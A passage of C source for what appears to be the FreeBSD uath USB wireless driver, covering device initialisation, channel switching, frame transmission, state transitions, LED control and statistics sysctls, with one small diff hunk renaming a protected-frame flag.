CFG_RATE_CONTROL_ENABLE, 0x00000001); uath_config(sc, CFG_DIVERSITY_CTL, 0x00000001); uath_config(sc, CFG_ABOLT, 0x0000003f); uath_config(sc, CFG_WME_ENABLED, 0x00000001); uath_config(sc, CFG_SERVICE_TYPE, 1); uath_config(sc, CFG_TP_SCALE, 0x00000000); uath_config(sc, CFG_TPC_HALF_DBM5, 0x0000003c); uath_config(sc, CFG_TPC_HALF_DBM2, 0x0000003c); uath_config(sc, CFG_OVERRD_TX_POWER, 0x00000000); uath_config(sc, CFG_GMODE_PROTECTION, 0x00000000); uath_config(sc, CFG_GMODE_PROTECT_RATE_INDEX, 0x00000003); uath_config(sc, CFG_PROTECTION_TYPE, 0x00000000); uath_config(sc, CFG_MODE_CTS, 0x00000002); error = uath_cmd_read(sc, WDCMSG_TARGET_START, NULL, 0, &val, sizeof(val), UATH_CMD_FLAG_MAGIC); if (error) { device_printf(sc->sc_dev, "could not start target, error %d\n", error); goto fail; } DPRINTF(sc, UATH_DEBUG_INIT, "%s returns handle: 0x%x\n", uath_codename(WDCMSG_TARGET_START), be32toh(val)); /* set default channel */ error = uath_switch_channel(sc, ic->ic_curchan); if (error) { device_printf(sc->sc_dev, "could not switch channel, error %d\n", error); goto fail; } val = htobe32(TARGET_DEVICE_AWAKE); uath_cmd_write(sc, WDCMSG_SET_PWR_MODE, &val, sizeof val, 0); /* XXX? check */ uath_cmd_write(sc, WDCMSG_RESET_KEY_CACHE, NULL, 0, 0); usbd_transfer_start(sc->sc_xfer[UATH_BULK_RX]); /* enable Rx */ uath_set_rxfilter(sc, 0x0, UATH_FILTER_OP_INIT); uath_set_rxfilter(sc, UATH_FILTER_RX_UCAST | UATH_FILTER_RX_MCAST | UATH_FILTER_RX_BCAST | UATH_FILTER_RX_BEACON, UATH_FILTER_OP_SET); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->sc_flags |= UATH_FLAG_INITDONE; callout_reset(&sc->watchdog_ch, hz, uath_watchdog, sc); return (0); fail: uath_stop_locked(ifp); return (error); } static void uath_init(void *arg) { struct uath_softc *sc = arg; UATH_LOCK(sc); (void)uath_init_locked(sc); UATH_UNLOCK(sc); } static void uath_stop_locked(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_ASSERT_LOCKED(sc); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->sc_flags &= ~UATH_FLAG_INITDONE; callout_stop(&sc->stat_ch); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; /* abort pending transmits */ uath_abort_xfers(sc); /* flush data & control requests into the target */ (void)uath_flush(sc); /* set a LED status to the disconnected. */ uath_set_ledstate(sc, 0); /* stop the target */ uath_cmd_write(sc, WDCMSG_TARGET_STOP, NULL, 0, 0); } static void uath_stop(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); uath_stop_locked(ifp); UATH_UNLOCK(sc); } static int uath_config(struct uath_softc *sc, uint32_t reg, uint32_t val) { struct uath_write_mac write; int error; write.reg = htobe32(reg); write.len = htobe32(0); /* 0 = single write */ *(uint32_t *)write.data = htobe32(val); error = uath_cmd_write(sc, WDCMSG_TARGET_SET_CONFIG, &write, 3 * sizeof (uint32_t), 0); if (error != 0) { device_printf(sc->sc_dev, "could not write register 0x%02x\n", reg); } return (error); } static int uath_config_multi(struct uath_softc *sc, uint32_t reg, const void *data, int len) { struct uath_write_mac write; int error; write.reg = htobe32(reg); write.len = htobe32(len); bcopy(data, write.data, len); /* properly handle the case where len is zero (reset) */ error = uath_cmd_write(sc, WDCMSG_TARGET_SET_CONFIG, &write, (len == 0) ? sizeof (uint32_t) : 2 * sizeof (uint32_t) + len, 0); if (error != 0) { device_printf(sc->sc_dev, "could not write %d bytes to register 0x%02x\n", len, reg); } return (error); } static int uath_switch_channel(struct uath_softc *sc, struct ieee80211_channel *c) { int error; UATH_ASSERT_LOCKED(sc); /* set radio frequency */ error = uath_set_chan(sc, c); if (error) { device_printf(sc->sc_dev, "could not set channel, error %d\n", error); goto failed; } /* reset Tx rings */ error = uath_reset_tx_queues(sc); if (error) { device_printf(sc->sc_dev, "could not reset Tx queues, error %d\n", error); goto failed; } /* set Tx rings WME properties */ error = uath_wme_init(sc); if (error) { device_printf(sc->sc_dev, "could not init Tx queues, error %d\n", error); goto failed; } error = uath_set_ledstate(sc, 0); if (error) { device_printf(sc->sc_dev, "could not set led state, error %d\n", error); goto failed; } error = uath_flush(sc); if (error) { device_printf(sc->sc_dev, "could not flush pipes, error %d\n", error); goto failed; } failed: return (error); } static int uath_set_rxfilter(struct uath_softc *sc, uint32_t bits, uint32_t op) { struct uath_cmd_rx_filter rxfilter; rxfilter.bits = htobe32(bits); rxfilter.op = htobe32(op); DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "setting Rx filter=0x%x flags=0x%x\n", bits, op); return uath_cmd_write(sc, WDCMSG_RX_FILTER, &rxfilter, sizeof rxfilter, 0); } static void uath_watchdog(void *arg) { struct uath_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "device timeout\n"); /*uath_init(ifp); XXX needs a process context! */ ifp->if_oerrors++; return; } callout_reset(&sc->watchdog_ch, hz, uath_watchdog, sc); } } static void uath_abort_xfers(struct uath_softc *sc) { int i; UATH_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < UATH_N_XFERS; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int uath_flush(struct uath_softc *sc) { int error; error = uath_dataflush(sc); if (error != 0) goto failed; error = uath_cmdflush(sc); if (error != 0) goto failed; failed: return (error); } static int uath_cmdflush(struct uath_softc *sc) { return uath_cmd_write(sc, WDCMSG_FLUSH, NULL, 0, 0); } static int uath_dataflush(struct uath_softc *sc) { struct uath_data *data; struct uath_chunk *chunk; struct uath_tx_desc *desc; UATH_ASSERT_LOCKED(sc); data = uath_getbuf(sc); if (data == NULL) return (ENOBUFS); data->buflen = sizeof(struct uath_chunk) + sizeof(struct uath_tx_desc); data->m = NULL; data->ni = NULL; chunk = (struct uath_chunk *)data->buf; desc = (struct uath_tx_desc *)(chunk + 1); /* one chunk only */ chunk->seqnum = 0; chunk->flags = UATH_CFLAGS_FINAL; chunk->length = htobe16(sizeof (struct uath_tx_desc)); memset(desc, 0, sizeof(struct uath_tx_desc)); desc->msglen = htobe32(sizeof(struct uath_tx_desc)); desc->msgid = (sc->sc_msgid++) + 1; /* don't care about endianness */ desc->type = htobe32(WDCMSG_FLUSH); desc->txqid = htobe32(0); desc->connid = htobe32(0); desc->flags = htobe32(0); #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { DPRINTF(sc, UATH_DEBUG_RESET, "send flush ix %d\n", desc->msgid); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(data->buf, data->buflen, '+'); } #endif STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UATH_STAT_INC(sc, st_tx_pending); sc->sc_tx_timer = 5; usbd_transfer_start(sc->sc_xfer[UATH_BULK_TX]); return (0); } static struct uath_data * _uath_getbuf(struct uath_softc *sc) { struct uath_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); UATH_STAT_DEC(sc, st_tx_inactive); } else bf = NULL; if (bf == NULL) DPRINTF(sc, UATH_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct uath_data * uath_getbuf(struct uath_softc *sc) { struct uath_data *bf; UATH_ASSERT_LOCKED(sc); bf = _uath_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UATH_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int uath_set_ledstate(struct uath_softc *sc, int connected) { DPRINTF(sc, UATH_DEBUG_LED, "set led state %sconnected\n", connected ? "" : "!"); connected = htobe32(connected); return uath_cmd_write(sc, WDCMSG_SET_LED_STATE, &connected, sizeof connected, 0); } static int uath_set_chan(struct uath_softc *sc, struct ieee80211_channel *c) { #ifdef UATH_DEBUG struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; #endif struct uath_cmd_reset reset; memset(&reset, 0, sizeof(reset)); if (IEEE80211_IS_CHAN_2GHZ(c)) reset.flags |= htobe32(UATH_CHAN_2GHZ); if (IEEE80211_IS_CHAN_5GHZ(c)) reset.flags |= htobe32(UATH_CHAN_5GHZ); /* NB: 11g =>'s 11b so don't specify both OFDM and CCK */ if (IEEE80211_IS_CHAN_OFDM(c)) reset.flags |= htobe32(UATH_CHAN_OFDM); else if (IEEE80211_IS_CHAN_CCK(c)) reset.flags |= htobe32(UATH_CHAN_CCK); /* turbo can be used in either 2GHz or 5GHz */ if (c->ic_flags & IEEE80211_CHAN_TURBO) reset.flags |= htobe32(UATH_CHAN_TURBO); reset.freq = htobe32(c->ic_freq); reset.maxrdpower = htobe32(50); /* XXX */ reset.channelchange = htobe32(1); reset.keeprccontent = htobe32(0); DPRINTF(sc, UATH_DEBUG_CHANNEL, "set channel %d, flags 0x%x freq %u\n", ieee80211_chan2ieee(ic, c), be32toh(reset.flags), be32toh(reset.freq)); return uath_cmd_write(sc, WDCMSG_RESET, &reset, sizeof reset, 0); } static int uath_reset_tx_queues(struct uath_softc *sc) { int ac, error; DPRINTF(sc, UATH_DEBUG_RESET, "%s: reset Tx queues\n", __func__); for (ac = 0; ac < 4; ac++) { const uint32_t qid = htobe32(ac); error = uath_cmd_write(sc, WDCMSG_RELEASE_TX_QUEUE, &qid, sizeof qid, 0); if (error != 0) break; } return (error); } static int uath_wme_init(struct uath_softc *sc) { /* XXX get from net80211 */ static const struct uath_wme_settings uath_wme_11g[4] = { { 7, 4, 10, 0, 0 }, /* Background */ { 3, 4, 10, 0, 0 }, /* Best-Effort */ { 3, 3, 4, 26, 0 }, /* Video */ { 2, 2, 3, 47, 0 } /* Voice */ }; struct uath_cmd_txq_setup qinfo; int ac, error; DPRINTF(sc, UATH_DEBUG_WME, "%s: setup Tx queues\n", __func__); for (ac = 0; ac < 4; ac++) { qinfo.qid = htobe32(ac); qinfo.len = htobe32(sizeof(qinfo.attr)); qinfo.attr.priority = htobe32(ac); /* XXX */ qinfo.attr.aifs = htobe32(uath_wme_11g[ac].aifsn); qinfo.attr.logcwmin = htobe32(uath_wme_11g[ac].logcwmin); qinfo.attr.logcwmax = htobe32(uath_wme_11g[ac].logcwmax); qinfo.attr.bursttime = htobe32(UATH_TXOP_TO_US( uath_wme_11g[ac].txop)); qinfo.attr.mode = htobe32(uath_wme_11g[ac].acm);/*XXX? */ qinfo.attr.qflags = htobe32(1); /* XXX? */ error = uath_cmd_write(sc, WDCMSG_SETUP_TX_QUEUE, &qinfo, sizeof qinfo, 0); if (error != 0) break; } return (error); } static int uath_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; struct uath_softc *sc = ifp->if_softc; int error; int startall = 0; UATH_LOCK(sc); error = (sc->sc_flags & UATH_FLAG_INVALID) ? ENXIO : 0; UATH_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { uath_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) uath_stop(ifp); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static int uath_tx_start(struct uath_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, struct uath_data *data) { struct ieee80211vap *vap = ni->ni_vap; struct uath_chunk *chunk; struct uath_tx_desc *desc; const struct ieee80211_frame *wh; struct ieee80211_key *k; int framelen, msglen; UATH_ASSERT_LOCKED(sc); data->ni = ni; data->m = m0; chunk = (struct uath_chunk *)data->buf; desc = (struct uath_tx_desc *)(chunk + 1); if (ieee80211_radiotap_active_vap(vap)) { struct uath_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; if (m0->m_flags & M_FRAG) tap->wt_flags |= IEEE80211_RADIOTAP_F_FRAG; ieee80211_radiotap_tx(vap, m0); } wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return (ENOBUFS); } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(desc + 1)); framelen = m0->m_pkthdr.len + IEEE80211_CRC_LEN; msglen = framelen + sizeof (struct uath_tx_desc); data->buflen = msglen + sizeof (struct uath_chunk); /* one chunk only for now */ chunk->seqnum = sc->sc_seqnum++; chunk->flags = (m0->m_flags & M_FRAG) ? 0 : UATH_CFLAGS_FINAL; if (m0->m_flags & M_LASTFRAG) chunk->flags |= UATH_CFLAGS_FINAL; chunk->flags = UATH_CFLAGS_FINAL; chunk->length = htobe16(msglen); /* fill Tx descriptor */ desc->msglen = htobe32(msglen); /* NB: to get UATH_TX_NOTIFY reply, `msgid' must be larger than 0 */ desc->msgid = (sc->sc_msgid++) + 1; /* don't care about endianness */ desc->type = htobe32(WDCMSG_SEND); switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: /* NB: force all management frames to highest queue */ if (ni->ni_flags & IEEE80211_NODE_QOS) { /* NB: force all management frames to highest queue */ desc->txqid = htobe32(WME_AC_VO | UATH_TXQID_MINRATE); } else desc->txqid = htobe32(WME_AC_BE | UATH_TXQID_MINRATE); break; case IEEE80211_FC0_TYPE_DATA: /* XXX multicast frames should honor mcastrate */ desc->txqid = htobe32(M_WME_GETAC(m0)); break; default: device_printf(sc->sc_dev, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); m_freem(m0); return (EIO); } if (vap->iv_state == IEEE80211_S_AUTH || vap->iv_state == IEEE80211_S_ASSOC || vap->iv_state == IEEE80211_S_RUN) desc->connid = htobe32(UATH_ID_BSS); else desc->connid = htobe32(UATH_ID_INVALID); desc->flags = htobe32(0 /* no UATH_TX_NOTIFY */); desc->buflen = htobe32(m0->m_pkthdr.len); #ifdef UATH_DEBUG DPRINTF(sc, UATH_DEBUG_XMIT, "send frame ix %u framelen %d msglen %d connid 0x%x txqid 0x%x\n", desc->msgid, framelen, msglen, be32toh(desc->connid), be32toh(desc->txqid)); if (sc->sc_debug & UATH_DEBUG_XMIT_DUMP) uath_dump_cmd(data->buf, data->buflen, '+'); #endif STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UATH_STAT_INC(sc, st_tx_pending); usbd_transfer_start(sc->sc_xfer[UATH_BULK_TX]); return (0); } /* * Cleanup driver resources when we run out of buffers while processing * fragments; return the tx buffers allocated and drop node references. */ static void uath_txfrag_cleanup(struct uath_softc *sc, uath_datahead *frags, struct ieee80211_node *ni) { struct uath_data *bf, *next; UATH_ASSERT_LOCKED(sc); STAILQ_FOREACH_SAFE(bf, frags, next, next) { /* NB: bf assumed clean */ STAILQ_REMOVE_HEAD(frags, next); STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); ieee80211_node_decref(ni); } } /* * Setup xmit of a fragmented frame. Allocate a buffer for each frag and bump * the node reference count to reflect the held reference to be setup by * uath_tx_start. */ static int uath_txfrag_setup(struct uath_softc *sc, uath_datahead *frags, struct mbuf *m0, struct ieee80211_node *ni) { struct mbuf *m; struct uath_data *bf; UATH_ASSERT_LOCKED(sc); for (m = m0->m_nextpkt; m != NULL; m = m->m_nextpkt) { bf = uath_getbuf(sc); if (bf == NULL) { /* out of buffers, cleanup */ uath_txfrag_cleanup(sc, frags, ni); break; } ieee80211_node_incref(ni); STAILQ_INSERT_TAIL(frags, bf, next); } return !STAILQ_EMPTY(frags); } /* * Reclaim mbuf resources. For fragmented frames we need to claim each frag * chained with m_nextpkt. */ static void uath_freetx(struct mbuf *m) { struct mbuf *next; do { next = m->m_nextpkt; m->m_nextpkt = NULL; m_freem(m); } while ((m = next) != NULL); } static void uath_start(struct ifnet *ifp) { struct uath_data *bf; struct uath_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m, *next; uath_datahead frags; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (sc->sc_flags & UATH_FLAG_INVALID)) return; UATH_LOCK(sc); for (;;) { bf = uath_getbuf(sc); if (bf == NULL) break; IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; /* * Check for fragmentation. If this frame has been broken up * verify we have enough buffers to send all the fragments * so all go out or none... */ STAILQ_INIT(&frags); if ((m->m_flags & M_FRAG) && !uath_txfrag_setup(sc, &frags, m, ni)) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: out of txfrag buffers\n", __func__); uath_freetx(m); goto bad; } sc->sc_seqnum = 0; nextfrag: /* * Pass the frame to the h/w for transmission. * Fragmented frames have each frag chained together * with m_nextpkt. We know there are sufficient uath_data's * to send all the frags because of work done by * uath_txfrag_setup. */ next = m->m_nextpkt; if (uath_tx_start(sc, m, ni, bf) != 0) { bad: ifp->if_oerrors++; reclaim: STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); uath_txfrag_cleanup(sc, &frags, ni); ieee80211_free_node(ni); continue; } if (next != NULL) { /* * Beware of state changing between frags. XXX check sta power-save state? */ if (ni->ni_vap->iv_state != IEEE80211_S_RUN) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: flush fragmented packet, state %s\n", __func__, ieee80211_state_name[ni->ni_vap->iv_state]); uath_freetx(next); goto reclaim; } m = next; bf = STAILQ_FIRST(&frags); KASSERT(bf != NULL, ("no buf for txfrag")); STAILQ_REMOVE_HEAD(&frags, next); goto nextfrag; } sc->sc_tx_timer = 5; } UATH_UNLOCK(sc); } static int uath_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct uath_data *bf; struct uath_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if ((sc->sc_flags & UATH_FLAG_INVALID) || !(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } UATH_LOCK(sc); /* grab a TX buffer */ bf = uath_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); UATH_UNLOCK(sc); return (ENOBUFS); } sc->sc_seqnum = 0; if (uath_tx_start(sc, m, ni, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); UATH_UNLOCK(sc); return (EIO); } UATH_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void uath_scan_start(struct ieee80211com *ic) { /* do nothing */ } static void uath_scan_end(struct ieee80211com *ic) { /* do nothing */ } static void uath_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } (void)uath_switch_channel(sc, ic->ic_curchan); UATH_UNLOCK(sc); } static int uath_set_rxmulti_filter(struct uath_softc *sc) { /* XXX broken */ return (0); } static void uath_update_mcast(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } /* * this is for avoiding the race condition when we're try to * connect to the AP with WPA. */ if (sc->sc_flags & UATH_FLAG_INITDONE) (void)uath_set_rxmulti_filter(sc); UATH_UNLOCK(sc); } static void uath_update_promisc(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } if (sc->sc_flags & UATH_FLAG_INITDONE) { uath_set_rxfilter(sc, UATH_FILTER_RX_UCAST | UATH_FILTER_RX_MCAST | UATH_FILTER_RX_BCAST | UATH_FILTER_RX_BEACON | UATH_FILTER_RX_PROM, UATH_FILTER_OP_SET); } UATH_UNLOCK(sc); } static int uath_create_connection(struct uath_softc *sc, uint32_t connid) { const struct ieee80211_rateset *rs; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct uath_cmd_create_connection create; ni = ieee80211_ref_node(vap->iv_bss); memset(&create, 0, sizeof(create)); create.connid = htobe32(connid); create.bssid = htobe32(0); /* XXX packed or not? */ create.size = htobe32(sizeof(struct uath_cmd_rateset)); rs = &ni->ni_rates; create.connattr.rateset.length = rs->rs_nrates; bcopy(rs->rs_rates, &create.connattr.rateset.set[0], rs->rs_nrates); /* XXX turbo */ if (IEEE80211_IS_CHAN_A(ni->ni_chan)) create.connattr.wlanmode = htobe32(WLAN_MODE_11a); else if (IEEE80211_IS_CHAN_ANYG(ni->ni_chan)) create.connattr.wlanmode = htobe32(WLAN_MODE_11g); else create.connattr.wlanmode = htobe32(WLAN_MODE_11b); ieee80211_free_node(ni); return uath_cmd_write(sc, WDCMSG_CREATE_CONNECTION, &create, sizeof create, 0); } static int uath_set_rates(struct uath_softc *sc, const struct ieee80211_rateset *rs) { struct uath_cmd_rates rates; memset(&rates, 0, sizeof(rates)); rates.connid = htobe32(UATH_ID_BSS); /* XXX */ rates.size = htobe32(sizeof(struct uath_cmd_rateset)); /* XXX bounds check rs->rs_nrates */ rates.rateset.length = rs->rs_nrates; bcopy(rs->rs_rates, &rates.rateset.set[0], rs->rs_nrates); DPRINTF(sc, UATH_DEBUG_RATES, "setting supported rates nrates=%d\n", rs->rs_nrates); return uath_cmd_write(sc, WDCMSG_SET_BASIC_RATE, &rates, sizeof rates, 0); } static int uath_write_associd(struct uath_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct uath_cmd_set_associd associd; ni = ieee80211_ref_node(vap->iv_bss); memset(&associd, 0, sizeof(associd)); associd.defaultrateix = htobe32(1); /* XXX */ associd.associd = htobe32(ni->ni_associd); associd.timoffset = htobe32(0x3b); /* XXX */ IEEE80211_ADDR_COPY(associd.bssid, ni->ni_bssid); ieee80211_free_node(ni); return uath_cmd_write(sc, WDCMSG_WRITE_ASSOCID, &associd, sizeof associd, 0); } static int uath_set_ledsteady(struct uath_softc *sc, int lednum, int ledmode) { struct uath_cmd_ledsteady led; led.lednum = htobe32(lednum); led.ledmode = htobe32(ledmode); DPRINTF(sc, UATH_DEBUG_LED, "set %s led %s (steady)\n", (lednum == UATH_LED_LINK) ? "link" : "activity", ledmode ? "on" : "off"); return uath_cmd_write(sc, WDCMSG_SET_LED_STEADY, &led, sizeof led, 0); } static int uath_set_ledblink(struct uath_softc *sc, int lednum, int ledmode, int blinkrate, int slowmode) { struct uath_cmd_ledblink led; led.lednum = htobe32(lednum); led.ledmode = htobe32(ledmode); led.blinkrate = htobe32(blinkrate); led.slowmode = htobe32(slowmode); DPRINTF(sc, UATH_DEBUG_LED, "set %s led %s (blink)\n", (lednum == UATH_LED_LINK) ? "link" : "activity", ledmode ? "on" : "off"); return uath_cmd_write(sc, WDCMSG_SET_LED_BLINK, &led, sizeof led, 0); } static int uath_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { enum ieee80211_state ostate = vap->iv_state; int error; struct ieee80211_node *ni; struct ieee80211com *ic = vap->iv_ic; struct uath_softc *sc = ic->ic_ifp->if_softc; struct uath_vap *uvp = UATH_VAP(vap); DPRINTF(sc, UATH_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); UATH_LOCK(sc); callout_stop(&sc->stat_ch); callout_stop(&sc->watchdog_ch); ni = ieee80211_ref_node(vap->iv_bss); switch (nstate) { case IEEE80211_S_INIT: if (ostate == IEEE80211_S_RUN) { /* turn link and activity LEDs off */ uath_set_ledstate(sc, 0); } break; case IEEE80211_S_SCAN: break; case IEEE80211_S_AUTH: /* XXX good place? set RTS threshold */ uath_config(sc, CFG_USER_RTS_THRESHOLD, vap->iv_rtsthreshold); /* XXX bad place */ error = uath_set_keys(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "could not set crypto keys, error %d\n", error); break; } if (uath_switch_channel(sc, ni->ni_chan) != 0) { device_printf(sc->sc_dev, "could not switch channel\n"); break; } if (uath_create_connection(sc, UATH_ID_BSS) != 0) { device_printf(sc->sc_dev, "could not create connection\n"); break; } break; case IEEE80211_S_ASSOC: if (uath_set_rates(sc, &ni->ni_rates) != 0) { device_printf(sc->sc_dev, "could not set negotiated rate set\n"); break; } break; case IEEE80211_S_RUN: /* XXX monitor mode doesn't be tested */ if (ic->ic_opmode == IEEE80211_M_MONITOR) { uath_set_ledstate(sc, 1); break; } /* * Tx rate is controlled by firmware, report the maximum * negotiated rate in ifconfig output. */ ni->ni_txrate = ni->ni_rates.rs_rates[ni->ni_rates.rs_nrates-1]; if (uath_write_associd(sc) != 0) { device_printf(sc->sc_dev, "could not write association id\n"); break; } /* turn link LED on */ uath_set_ledsteady(sc, UATH_LED_LINK, UATH_LED_ON); /* make activity LED blink */ uath_set_ledblink(sc, UATH_LED_ACTIVITY, UATH_LED_ON, 1, 2); /* set state to associated */ uath_set_ledstate(sc, 1); /* start statistics timer */ callout_reset(&sc->stat_ch, hz, uath_stat, sc); break; default: break; } ieee80211_free_node(ni); UATH_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static int uath_set_key(struct uath_softc *sc, const struct ieee80211_key *wk, int index) { #if 0 struct uath_cmd_crypto crypto; int i; memset(&crypto, 0, sizeof(crypto)); crypto.keyidx = htobe32(index); crypto.magic1 = htobe32(1); crypto.size = htobe32(368); crypto.mask = htobe32(0xffff); crypto.flags = htobe32(0x80000068); if (index != UATH_DEFAULT_KEY) crypto.flags |= htobe32(index << 16); memset(crypto.magic2, 0xff, sizeof(crypto.magic2)); /* * Each byte of the key must be XOR'ed with 10101010 before being * transmitted to the firmware. */ for (i = 0; i < wk->wk_keylen; i++) crypto.key[i] = wk->wk_key[i] ^ 0xaa; DPRINTF(sc, UATH_DEBUG_CRYPTO, "setting crypto key index=%d len=%d\n", index, wk->wk_keylen); return uath_cmd_write(sc, WDCMSG_SET_KEY_CACHE_ENTRY, &crypto, sizeof crypto, 0); #else /* XXX support H/W cryto */ return (0); #endif } static int uath_set_keys(struct uath_softc *sc, struct ieee80211vap *vap) { int i, error; error = 0; for (i = 0; i < IEEE80211_WEP_NKID; i++) { const struct ieee80211_key *wk = &vap->iv_nw_keys[i]; if (wk->wk_flags & (IEEE80211_KEY_XMIT|IEEE80211_KEY_RECV)) { error = uath_set_key(sc, wk, i); if (error) return (error); } } if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) { error = uath_set_key(sc, &vap->iv_nw_keys[vap->iv_def_txkey], UATH_DEFAULT_KEY); } return (error); } #define UATH_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) static void uath_sysctl_node(struct uath_softc *sc) { struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child; struct sysctl_oid *tree; struct uath_stat *stats; stats = &sc->sc_stat; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, "UATH statistics"); child = SYSCTL_CHILDREN(tree); UATH_SYSCTL_STAT_ADD32(ctx, child, "badchunkseqnum", &stats->st_badchunkseqnum, "Bad chunk sequence numbers"); UATH_SYSCTL_STAT_ADD32(ctx, child, "invalidlen", &stats->st_invalidlen, "Invalid length"); UATH_SYSCTL_STAT_ADD32(ctx, child, "multichunk", &stats->st_multichunk, "Multi chunks"); UATH_SYSCTL_STAT_ADD32(ctx, child, "toobigrxpkt", &stats->st_toobigrxpkt, "Too big rx packets"); UATH_SYSCTL_STAT_ADD32(ctx, child, "stopinprogress", &stats->st_stopinprogress, "Stop in progress"); UATH_SYSCTL_STAT_ADD32(ctx, child, "crcerrs", &stats->st_crcerr, "CRC errors"); 